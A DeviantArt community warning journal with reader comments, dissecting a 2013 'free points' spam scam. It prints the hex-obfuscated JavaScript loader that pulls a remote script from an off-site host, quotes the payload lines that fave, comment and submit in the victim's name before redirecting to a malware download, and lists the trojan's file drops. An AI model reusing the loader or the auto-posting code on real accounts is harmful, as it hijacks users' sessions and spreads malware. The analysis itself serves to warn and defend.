
Update April, 29: All spam accounts from last weekend have been deleted by DA staff.



But new spam accounts have been opened. Please report them to the Help Desk and/or leave a comment here or on petersong's page.

Copied from here:
petersong.deviantart.com/art/S…



Before you do anything stupid, please read this

Obviously, this offer is a swindle.
And as such it is dangerous for you !

table of contents


  • What it does
  • And then what ?
  • What can we do ?
  • "I installed it, but I'm okay"
  • "OMG my brother did it !"
  • Updates


  • What it does


    "\x61" is just another way to write "a" (a hexadecimal escape: 61 is the hexadecimal character code of "a")

    Thus,

    ["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x68\x74\x74\x70\x3A\x2F\x2F\x64\x65\x76\x69\x61\x6E\x74\x61\x72\x74\x2E\x68\x70\x2E\x61\x66\x2E\x63\x6D\x2F\x67\x65\x6E\x65\x72\x61\x74\x6F\x72\x2F\x6D\x69\x78\x2E\x6A\x73"]

    is just written words. Script actually.

    You can have it safely translated by using the "unescape" JavaScript function, on this part of the script only.

    Once translated, this script does one thing : it includes a bigger, more elaborate script as part of the DA page.

    This script can be found here :
    deviantart.hp.af.cm/generator/…

    This script will now be able to act in your name

    Note that this script is NOT hosted by the deviantart.com website. It is a foreign website, hosted in Cameroon (Africa), in such a way that the scammers can't be found by simple, regular investigations. They are hiding, and hiding well.
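The decoding step described above, as an added example (not part of the original article or of the spam script): it decodes the escapes by plain text substitution, without evaluating anything, and checks whether any URL in the result is really on deviantart.com. The function names and the `deviantart.com` trust check are assumptions of this example; it also handles `\uNNNN` escapes, which the snippet on this page does not use.

```javascript
// Added example. The string table from the spam snippet, held as inert text:
// String.raw keeps the backslashes, so nothing here is decoded by the parser.
const OBFUSCATED = String.raw`["\x73\x72\x63","\x73\x63\x72\x69\x70\x74",
"\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74",
"\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79",
"\x68\x74\x74\x70\x3A\x2F\x2F\x64\x65\x76\x69\x61\x6E\x74\x61\x72\x74\x2E\x68\x70\x2E\x61\x66\x2E\x63\x6D\x2F\x67\x65\x6E\x65\x72\x61\x74\x6F\x72\x2F\x6D\x69\x78\x2E\x6A\x73"]`;

// Replace \xNN and \uNNNN escapes with the characters they stand for.
// Pure text substitution: no eval, no Function, no script execution.
function decodeEscapes(text) {
  return text.replace(/\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})/g,
    (_, x, u) => String.fromCharCode(parseInt(x || u, 16)));
}

// Pull every double-quoted literal out of the source text and decode it.
function extractStrings(source) {
  const out = [];
  const literal = /"((?:[^"\\]|\\.)*)"/g;
  let m;
  while ((m = literal.exec(source)) !== null) out.push(decodeEscapes(m[1]));
  return out;
}

// A host is trusted only if it IS the domain or a subdomain of it.
// "deviantart.hp.af.cm" merely starts with the brand name and fails this.
function isTrustedHost(hostname, trustedDomain) {
  const h = hostname.toLowerCase();
  return h === trustedDomain || h.endsWith("." + trustedDomain);
}

// Decode the snippet and report every URL with its real host.
function auditSnippet(source, trustedDomain) {
  const strings = extractStrings(source);
  const findings = [];
  for (const s of strings) {
    if (!/^https?:\/\//i.test(s)) continue;
    let host;
    try { host = new URL(s).hostname; } catch (e) { continue; }
    findings.push({ url: s, host, trusted: isTrustedHost(host, trustedDomain) });
  }
  return { strings, findings };
}

console.log(JSON.stringify(auditSnippet(OBFUSCATED, "deviantart.com"), null, 2));
```

The decoded words show the pattern the article describes: a `script` element is created, its `src` is set to the off-site URL, and it is appended to the page `body`.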

    This new script does something else.
    For now (but it might change) :

    document.getElementById("gmi-ResourceViewFaveButton").click();
    It simulates a click on the "Fave" button.

    document.getElementById("commentbody").value="It actually works! Wohoooooooo! Thanks!";
    It writes (in your name) a fake comment saying "It actually works! Wohoooooooo! Thanks!".

    setTimeout("document.getElementsByClassName('ll f')[0].click()", 100);
    It schedules a click that hides these actions by reopening the comment area once the comment is posted.

    document.getElementsByClassName("smbutton smbutton-blue smbutton-big comment-submit")[0].click();
    It submits the comment (in your name).

    window.top.location.href='deviantart.hp.af.cm/generator';
    alert('DeviantART: Welcome to deviantART\'s Points Generator! You will be redirected to our generator. Click OK to proceed')

    It programs a redirection to their website and displays an alert that says "DeviantART: Welcome to deviantART\'s Points Generator! You will be redirected to our generator. Click OK to proceed"

    And then what ?


    And then you won't get any DA points, of course. I bet you guessed that already…

    Instead, they will tell you "Oh, you don't have this great plugin, come and download it !" and launch the download anyway. And this is where you get screwed if you are gullible enough to run an executable file from a random site hidden in Cameroon…
    I don't know (yet) what this exe file does. But I know what it could do.
    First off, it might be (and probably is) a security breach on your computer. Trojan, virus, remote agent…
    Which in turn could be aimed at several things : spreading this publication so that others get screwed, stealing personal information (such as payment card numbers), using your computer as a proxy for network attacks…

    If you already downloaded the file, please, be very careful. Use antiviral detection and malware removal on your computer now, and in a few days. Firewall protection is a must have.
    The malware might steal your "cookie" too. This means that your password might be compromised. Actually not only for deviantArt.

    What can we do ?


    For now, we can try to warn and inform people.
    Try to make them stop spreading this stupid hoax.
    If you have any idea of what more to do, please, comment.

    "I installed it, but I'm okay"


    Are you so very sure of this ? FYI, virustotal.com ran a virus detection on the exe file using 45 antivirus engines and states that only 3 of the 45 found a threat.
    Report can be found here : see the virustotal report
    Now, do as you want.

    "OMG my brother did it !"


    I did not download/run that exe file, am I safe ?


    As far as I know
    • There was no harmful code in the JavaScript stuff that I saw, but it can change at any time
    • Any reasonable browser should not be able to execute a downloaded file without warning you before (and the "plugin" stuff is AFAIK only fake div displayed as part of the internet webpage, then not harmful)
    • I think that the only thing really endangered by the JavaScript is your session cookie, so changing your password might be wise.
    • I have heard of other more sophisticated attacks like buffer overflowing and stuff, but I'm not competent enough to tell you if there is such a threat. Then consider you are not safe until someone can tell us whether there is such a potential threat.

    Thus I would say that as far as I know, you should be relatively safe, but I also know that this is a huge field and that I'm no pro. So you should consider being careful, and having antiviral + firewall protection up to date on your computer (as everyone else).

    Connected Viruses/Malware/Adware identified


    One or several of these pieces of malware might have been dropped on your computer if this exe file was run on it :
    • Trojan
      • Identified by Emsisoft as Trojan.MSIL.Spy.Agent.AMN (A)
      • Identified by Fortinet as MSIL/Agent.HG!tr.spy
      • Identified by ESET-NOD32 as a variant of MSIL/Spy.Agent.HG
      • Identified by many other malware detectors as Trojan.GenericKD.966175
      • This is a serious threat
      • This is a Trojan, which means it is malicious software spying on your computer and sending this data (or giving access to it) to malicious people. See the Internet Holy Bible for reference.
      • Some antivirus are free. See the Mighty Source of all Truth for reference.
      • Fresh news here thanks to ~krisiskiller101 investigations !
        • He was able to get rid of it using MalwareBYTES
        • He confirmed that RASMan service was up on his computer. Though, this service is not supposed to be harmful and might have been up before. It might also be part of the trojan attack that was not turned back up by the fix because it is not harmful alone.
        • Thanks for the info !
    • AdWare.iBryte.H
      • Seems to be a recent version of the well-known adware iBryte
      • Only Comodo antimalware seems to identify it. Maybe ESET-NOD32 too.
      • Be very careful, as searching for "iBryte.H removal" can lead to spywareprotectiontool.com, which is a malicious website giving you malware instead of solutions
      • You can find instructions for removing this adware by searching for "iBryte removal", but I don't know if they would work with this version of the adware (please, tell us if you have any success with one of these procedures)
    • Optimum Installer (fs)


    Personal investigations


    I don't have a packaged solution. And I probably won't have enough time to investigate this stuff thoroughly.
    Yet, I found some hints, by diving modestly into this sh*t. I share them for the people they might help.
    This program does the following :
    • It messes up your registry in a theatrical way
      • It probably affects the download manager associated with your web browser
      • It probably affects the toolbars in your web browser
      • Writes 'test' everywhere in the registry
      • Messes with your IE cache
    • Creates files
      • Creates an executable file named "D2M-Precheck.exe", hidden in "C:\Documents and Settings\Your_User_Name\Local Settings\Temp"
      • Creates an executable file named "check_offer_rp.dll", hidden in "C:\Documents and Settings\Your_User_Name\Local Settings\Temp"
      • Creates copies of these two files in a subdirectory of "C:\Documents and Settings\Your_User_Name\Local Settings\Temporary Internet Files\Content.IE5\"
    • Runs the created exe file, which in turn spoils your computer :
      • Creates a new "exe" file named "Impressioner.exe" along with "System.Data.SQLite.dll" and "imp.dat" files, hidden in the same place : "C:\Documents and Settings\Your_User_Name\Local Settings\Temp"
    • Transfers data over the internet to a number of addresses, among them :
      • cdn.install.oibundles2.com (the only thing done here is downloading the dll file stated before)
    • Probably displays advertising


    Be careful : this is not an exhaustive list. And not everything listed above is necessarily harmful (e.g. SQLite.dll is just a database they use, not a virus itself, probably). Do not edit your Registry if you don't know exactly what you are doing.
    Moreover, I have no idea what this "impressioner.exe" does. So there might be a lot more mess to clean. By the way, if you were infected and are able to find this file, please, consider sending a copy of it to me.
    -edit- Okay, it will be hard to find this file on your drive : this file "does something" (including turning up RASMAN Service) and deletes itself. This is really not comforting.

    This said, and with no guarantee of any kind, "do it at your own risk" and stuff, I think that you can safely delete the exe and dll files mentioned above. It might rid you of part of the infection.

    If you have more information or if you can teach me something about this kind of investigation, please, contact me, I will update.
    This information might even be wrong depending on your OS and configuration !


    Updates


    • There are at least 2 scripts, now : mix.js and nr.js (the second one only faves without leaving a comment)
    • There are at least two messages spreading this sh*t
    • It seems I was totally wrong in thinking that infected people were spreading those messages. It is more probably bots registering and posting every x seconds





    Thanks for reading.
Update: The spam accounts have been deleted.




Currently there is a massive and dangerous spam bot running in DA galleries. If you look for newest deviations you will see countless new deviations with the same content every few seconds.


DON'T DO WHAT'S BEEN SUGGESTED IN THE TEXT OF THE SPAM POST!!!



It installs a trojan or a virus on your computer and of course you WON'T get the promised 20.000 points for free. I copied the article from ~PetersonG [link]


PLEASE FAV AND SHARE


to warn the community about this troll who is operating from three accounts at the moment. You don't have to report these accounts because this has been done numerous times by now. Thank you!

:iconsimoncaneplz:
SimonCaneplz Featured By Owner 4 days ago  New member
I'm pretty sure it's rare, I think.
Reply
:iconproject-scary0pasta:
Project-SCARY0PASTA Featured By Owner Apr 10, 2015  New member Student Digital Artist
Don't know who this is / was.... but hopefully it's gone. I read this thing and was really angry that someone would do that.... there are many bad people in the world, and that bot / person is one of them. Thank you for posting this, and have a great day / night.... I appreciate you posting this.
Reply
:icongiratinaa:
giratinaa Featured By Owner Aug 31, 2013  Hobbyist General Artist

what about the "dapointsgenerator" on youtube??

:icontonysimon:

Reply
:iconlilyas:
Lilyas Featured By Owner Sep 2, 2013  Professional General Artist
I don't know. What's about it?
Reply
:icongiratinaa:
giratinaa Featured By Owner Sep 2, 2013  Hobbyist General Artist
oh, is it another virus?
Reply
:icongraphicsgail:
GraphicsGail Featured By Owner Jun 28, 2013
A few weeks ago I was about to do it and realized it was too good to be true so it was a scam.
Reply
:iconkaylafoxeh:
KaylaFoxeh Featured By Owner Jun 28, 2013  Hobbyist Digital Artist
This is nuts! All this virus talk reminds me of the chain virus attack I had once... Uggggggh it wasn't pretty. It was so bad, I even had intrusive advertising without being connected to the internet because that can contain a virus attack.. disconnecting from the internet and stuff. Took me 3 days to contain and destroy it all. But this.. takes the cake. It is really terrifying
Reply
:iconthedreaminghawk:
TheDreamingHawk Featured By Owner Jun 23, 2013
They returned AGAIN. I can't get why most spambots come from barren areas. (Like Panama and Cameroon). I wish DA could install an "Are you human?" thing where you are forced to choose yes or no to make them stop.
Reply
:iconmama-malamute:
Mama-Malamute Featured By Owner Jun 20, 2013  Hobbyist Digital Artist
They're back...
Reply
:iconcustardandpie:
CustardAndPie Featured By Owner May 16, 2013  Hobbyist Digital Artist
[link]

They're back. . . . and I managed to catch FOUR IN A ROW yet again.
Reply
:iconlilyas:
Lilyas Featured By Owner May 16, 2013  Professional General Artist
DA filters became quite fast lately. It seems they are gone already - for now.
Reply
:iconcustardandpie:
CustardAndPie Featured By Owner May 17, 2013  Hobbyist Digital Artist
Let's hope the scammers go out. . . and STAY out.
Reply
:iconcannonstar17:
cannonstar17 Featured By Owner May 16, 2013  Student Artist
New account spam account alert!: ~burntinstant [link]
Reply
:iconlilyas:
Lilyas Featured By Owner May 13, 2013  Professional General Artist
Aww, look, it's gone already. :hug:
Reply
:icondrache-lehre:
Drache-Lehre Featured By Owner May 13, 2013  Hobbyist General Artist
Oh :w00t: !
Reply
:icondshere:
Dshere Featured By Owner May 11, 2013
nevermind, just answered my own question, he's using appfog still which at his link shows a page telling you to install "VIO flash player!" and the page itself insists that it is a "DA points generator"

Reported his link to Appfog myself, it'll be a dead link when they get to it.
Reply
:icondshere:
Dshere Featured By Owner May 11, 2013
I've been away, anyone notice if it is still using appfog to shorten a URL?
Appfog has antispam policy and will delete the link the spammer uses, you just need to flag them to the link he uses.
Reply
:iconxxjmxpxx:
xxJMXPxx Featured By Owner May 11, 2013  Hobbyist Digital Artist
The spambots are now 'dedicating' (I think) their works to a specific member in DA. I checked the names put in there and they are real DA members... hopefully, they wouldn't fall for it because of their wrong grammar.
Reply
:iconlilyas:
Lilyas Featured By Owner May 11, 2013  Professional General Artist
Basically it has nothing to do with the members whose names they use in the title. They just needed to find a new routine to bypass DA's filter.
Reply
:iconxxjmxpxx:
xxJMXPxx Featured By Owner May 11, 2013  Hobbyist Digital Artist
oh...ok ^^
Reply
:iconsugarislife28:
sugarislife28 Featured By Owner May 10, 2013  Hobbyist Digital Artist
another one again [link]
Reply
:iconlilyas:
Lilyas Featured By Owner May 10, 2013  Professional General Artist
Just keep on reporting. They are gone soon....
Reply
:iconsugarislife28:
sugarislife28 Featured By Owner May 10, 2013  Hobbyist Digital Artist
ok
Reply
:iconpa-admin:
PA-Admin Featured By Owner May 10, 2013
Another one - [link]
Reply
:icondrache-lehre:
Drache-Lehre Featured By Owner May 9, 2013  Hobbyist General Artist
Got more at it again! D=

[link] and [link]

I swear at this rate, DA should NOT let new accounts be created until they can find a better way to stop/avoid these.
Reply
:iconred-warrioress:
Red-Warrioress Featured By Owner May 9, 2013  Hobbyist Digital Artist
New one
:iconaquaticwiseop:
Just to let you know :I
Reply
:iconxredmemory:
xReDMemory Featured By Owner May 9, 2013
I don't get how it benefits these people who create bots to spam this.
Reply
:iconlilyas:
Lilyas Featured By Owner May 9, 2013  Professional General Artist
They lure you to scam pages where they steal your data or make you buy stuff whatsoever...
Reply
:iconxredmemory:
xReDMemory Featured By Owner May 9, 2013
I see.
Reply
:icondrache-lehre:
Drache-Lehre Featured By Owner May 3, 2013  Hobbyist General Artist
Ugh, got 2 taken care of just to see another one pop up! D= [link]
Reply
:icondrache-lehre:
Drache-Lehre Featured By Owner May 2, 2013  Hobbyist General Artist
And another one. >.< [link]
Reply
:iconlilyas:
Lilyas Featured By Owner May 2, 2013  Professional General Artist
They are banned quickly meanwhile. DA has learned....
Reply
:icondrache-lehre:
Drache-Lehre Featured By Owner May 3, 2013  Hobbyist General Artist
Not fast enough. :shrug:
Reply
:icondrache-lehre:
Drache-Lehre Featured By Owner May 2, 2013  Hobbyist General Artist
Here is another account doing this >> [link]
Reply
:iconmilovanf:
milovanf Featured By Owner May 3, 2013  Professional Digital Artist
Banned! At last DA has learned its lesson. Now all we have to do is teach the DA admins to take action on art thieves, no matter that reports have been posted by fans instead of owners...:roll:
Reply
:icondrache-lehre:
Drache-Lehre Featured By Owner May 3, 2013  Hobbyist General Artist
* lol lets THEM be lazier.

Apologies, I am tired. Been a busy day.
Reply
:iconmilovanf:
milovanf Featured By Owner May 3, 2013  Professional Digital Artist
It's fine.
Reply
:icondrache-lehre:
Drache-Lehre Featured By Owner May 3, 2013  Hobbyist General Artist
Ugh I don't think that will ever change to being the way it was. Makes it harder for the rest of us and lets me be lazier.
Reply
:iconmilovanf:
milovanf Featured By Owner May 3, 2013  Professional Digital Artist
I'm lazy too. I don't even pay attention on what I'm writing when I'm talking to someone. :XD:
Reply
:iconkibawhitewarrior:
KibaWhiteWarrior Featured By Owner May 2, 2013  Student Digital Artist
My friend lost her account to this. Don't do it </3
Reply
:iconmrento:
mrento Featured By Owner May 2, 2013
I reported another incarnation of this from about 30 minutes ago, this one using a server in Grenada (.gd)
Reply
:iconqueen-soulia:
Queen-Soulia Featured By Owner May 1, 2013  Hobbyist General Artist
and now it is back :
[link]
Reply
:iconlilyas:
Lilyas Featured By Owner May 1, 2013  Professional General Artist
Naaaah..... Gone......
Reply
:iconqueen-soulia:
Queen-Soulia Featured By Owner May 1, 2013  Hobbyist General Artist
it is back and announces a contest like all the other giveaway contests but says you have to visit a link. Many young members will fall for this one.. again
Reply
:iconlilyas:
Lilyas Featured By Owner May 1, 2013  Professional General Artist
Damn!
Reply
:iconwikipediauser:
WIKIPEDIAUSER Featured By Owner May 1, 2013  Student Artist
Thank you so much, Comrade :salute:
Reply
Submitted on
April 28, 2013